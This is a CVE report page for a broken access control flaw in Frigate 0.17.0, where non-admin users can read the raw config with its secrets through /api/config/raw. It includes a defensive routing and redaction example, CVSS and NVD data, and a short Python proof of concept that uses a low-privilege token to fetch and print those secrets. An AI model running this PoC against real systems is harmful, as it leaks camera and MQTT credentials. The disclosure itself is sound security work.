Security Vulnerability Report
CVE-2026-33469 CVSS 6.5 MEDIUM

CVE-2026-33469

Published: 2026-03-26 17:16:41
Last Modified: 2026-03-31 13:07:34

Description

Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. In version 0.17.0, an authenticated non-admin user can retrieve the full raw Frigate configuration through `/api/config/raw`. This exposes sensitive values that are intentionally redacted from `/api/config`, including camera credentials, go2rtc stream credentials, MQTT passwords, proxy secrets, and any other secrets stored in `config.yml`. This appears to be a broken access control issue introduced by the admin-by-default API refactor: `/api/config/raw_paths` is admin-only, but `/api/config/raw` is still accessible to any authenticated user. Version 0.17.1 contains a patch.
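The failure the description names is a single endpoint left outside an otherwise admin-by-default API. The following is an added example, not Frigate's code: a minimal admin-by-default route table in which a handler that declares no role fails closed, a redaction pass that produces the `/api/config` view from the unredacted `config.yml` contents, and an audit function that flags any route still handing the unredacted config to non-admins. The route paths come from the description; the config contents, the role names and the handlers are constructed for the example.

```python
import re

# Constructed config.yml-like sample (not a real deployment).
RAW_CONFIG = {
    "mqtt": {"host": "broker", "user": "frigate", "password": "s3cret"},
    "cameras": {"front": {"ffmpeg": {"inputs": [{"path": "rtsp://admin:camerapw@192.0.2.5/stream"}]}}},
}
SECRET_KEYS = {"password", "secret", "token"}
USERINFO = re.compile(r"://[^/:@]+:[^@/]+@")  # user:pass@ embedded in stream URLs

def redact(node):
    """What /api/config should return: same shape, secret values replaced."""
    if isinstance(node, dict):
        return {k: "***" if k.lower() in SECRET_KEYS else redact(v) for k, v in node.items()}
    if isinstance(node, list):
        return [redact(v) for v in node]
    if isinstance(node, str):
        return USERINFO.sub("://***:***@", node)
    return node

ROUTES = {}  # path -> (required role, handler)

def route(path, role="admin"):
    """Admin-by-default registration: a handler that says nothing about its role is admin-only."""
    def wrap(fn):
        ROUTES[path] = (role, fn)
        return fn
    return wrap

@route("/api/config", role="viewer")      # any authenticated user, redacted view
def config_view():
    return redact(RAW_CONFIG)

@route("/api/config/raw")                 # no role given -> admin only (the 0.17.1 state)
def config_raw():
    return RAW_CONFIG

def dispatch(path, user_role):
    """Return (status, body) for an authenticated user with user_role requesting path."""
    if path not in ROUTES:
        return 404, None
    required, handler = ROUTES[path]
    if required == "admin" and user_role != "admin":
        return 403, None
    return 200, handler()

def audit_routes():
    """Regression check for this bug class: routes serving the unredacted config to non-admins."""
    return [p for p, (req, h) in ROUTES.items() if req != "admin" and h() == RAW_CONFIG]
```

Registering the raw endpoint with `role="viewer"` reproduces the 0.17.0 condition, and `audit_routes()` then lists it; with the default registration the list is empty.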

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:frigate:frigate:0.17.0:*:*:*:*:*:*:* - VULNERABLE
Frigate 0.17.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# PoC for CVE-2026-33469
# Description: Retrieve sensitive config using a low-privilege user token.
# Target: Frigate 0.17.0

target_url = "http://target-ip:5000/api/config/raw"

# Replace with a valid authenticated session cookie or token
auth_token = "LOW_PRIV_USER_TOKEN"

headers = {
    "Authorization": f"Bearer {auth_token}",
    "Content-Type": "application/json",
}

try:
    response = requests.get(target_url, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Vulnerability Confirmed!")
        print("[+] Sensitive Configuration Data:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[-] Error occurred: {e}")
```

References

https://github.com/blakeblackshear/frigate/security/advisories/GHSA-26g3-f8g8-9ffh (Exploit, Mitigation, Vendor Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-33469", "sourceIdentifier": "[email protected]", "published": "2026-03-26T17:16:41.157", "lastModified": "2026-03-31T13:07:34.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. In version 0.17.0, an authenticated non-admin user can retrieve the full raw Frigate configuration through `/api/config/raw`. This exposes sensitive values that are intentionally redacted from `/api/config`, including camera credentials, go2rtc stream credentials, MQTT passwords, proxy secrets, and any other secrets stored in `config.yml`. This appears to be a broken access control issue introduced by the admin-by-default API refactor: `/api/config/raw_paths` is admin-only, but `/api/config/raw` is still accessible to any authenticated user. Version 0.17.1 contains a patch."}, {"lang": "es", "value": "Frigate es un grabador de vídeo en red (NVR) con detección de objetos local en tiempo real para cámaras IP. En la versión 0.17.0, un usuario autenticado no administrador puede recuperar la configuración completa sin procesar de Frigate a través de `/api/config/raw`. Esto expone valores sensibles que son intencionalmente redactados de `/api/config`, incluyendo credenciales de cámara, credenciales de flujo de go2rtc, contraseñas MQTT, secretos de proxy y cualquier otro secreto almacenado en `config.yml`. Esto parece ser un problema de control de acceso roto introducido por la refactorización de la API de administrador por defecto: `/api/config/raw_paths` es solo para administradores, pero `/api/config/raw` sigue siendo accesible para cualquier usuario autenticado. La versión 0.17.1 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frigate:frigate:0.17.0:*:*:*:*:*:*:*", "matchCriteriaId": "FB927AB9-39C9-4351-9838-750C739C0C59"}]}]}], "references": [{"url": "https://github.com/blakeblackshear/frigate/security/advisories/GHSA-26g3-f8g8-9ffh", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/blakeblackshear/frigate/security/advisories/GHSA-26g3-f8g8-9ffh", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
```